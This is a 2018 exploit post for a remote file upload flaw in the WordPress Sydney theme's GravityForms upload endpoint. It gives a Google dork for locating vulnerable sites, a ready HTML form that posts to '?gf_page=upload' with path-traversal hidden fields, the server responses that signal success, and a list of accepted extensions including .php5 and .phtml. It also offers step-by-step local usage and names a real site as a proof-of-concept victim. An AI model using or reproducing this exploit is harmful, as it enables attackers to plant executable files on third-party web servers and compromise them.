################################################################################################# # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 08/06/2018 # Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.'' # Exploit HTML Code : <title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title> <form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.html" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> </form> Exploit : TARGET/?gf_page=upload We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter. # Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} # Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}} # Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf # You don't need to change your filename as _input__kingskrupellos.php5 like this. # Just choose a file from your machine and upload it with the beforementioned extensions. # For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5 # Example Usage for Windows : # Use with XAMPP Control Panel and your Localhost. # Use from htdocs folder located in XAMPP # 127.0.0.1/athemeswordpressexploiter.html # Path : TARGET/_input__kingskrupellos.php5 ################################################################################################# # Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################